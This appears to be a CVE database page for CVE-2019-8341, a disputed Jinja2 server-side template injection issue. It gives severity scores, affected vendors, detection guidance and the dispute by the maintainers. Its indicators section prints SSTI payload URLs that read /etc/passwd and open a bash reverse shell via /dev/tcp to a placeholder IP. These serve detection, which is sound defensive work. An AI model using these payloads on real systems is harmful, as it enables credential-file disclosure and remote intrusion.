cbcvebase.
CVE-2019-8341
published 2019-02-15

CVE-2019-8341: An issue was discovered in Jinja2 2.10. The from_string function is prone to Server Side Template Injection (SSTI) where it takes the "source" parameter as a…

PriorityP275critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
44.78%
98.6th percentile
An issue was discovered in Jinja2 2.10. The from_string function is prone to Server Side Template Injection (SSTI) where it takes the "source" parameter as a template object, renders it, and then returns it. The attacker can exploit it with {{INJECTION COMMANDS}} in a URI. NOTE: The maintainer and multiple third parties believe that this vulnerability isn't valid because users shouldn't use untrusted templates without sandboxing

Affected

4 ranges
VendorProductVersion rangeFixed in
debianjinja2
opensuseleap
opensuseleap
pocoojinja2

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://localhost:4444/?username={{4*4}}
urlhttp://localhost:4444/?username={{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
urlhttp://localhost:4444/?username={{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }}
commandbash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1
  • Detect SSTI payloads in HTTP query parameters by looking for Jinja2 template expression delimiters {{ }} in URI/request values, particularly in parameters like 'username'.
  • Monitor for Python MRO/subclass traversal patterns in HTTP parameters indicative of SSTI exploitation: ''.__class__.__mro__[2].__subclasses__()[40]
  • Detect reverse shell attempts via Jinja2 SSTI using config['RUNCMD'] with bash TCP redirection in template injection payloads.
  • Flag use of Jinja2.from_string() where the 'source' parameter is derived from user-controlled input (e.g., request.values.get()) without sandboxing — this is the vulnerable code pattern.
  • ·This CVE is disputed by the Jinja2 maintainers and multiple vendors (Red Hat, Pallets project). The behavior is considered expected/by-design: Jinja2 does not guarantee safe handling of untrusted templates without sandboxing enabled. No patch exists or is planned.
  • ·Red Hat explicitly assessed all their products as 'Not affected' and considers the CVE assignment invalid.
  • ·Jinja2 maintainers submitted a REJECT request to MITRE; the CVE status is disputed. Detection rules targeting this CVE should be scoped to application-level misuse, not a framework vulnerability.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv9.8CRITICAL
vendor_debian9.8LOW
vendor_redhat9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.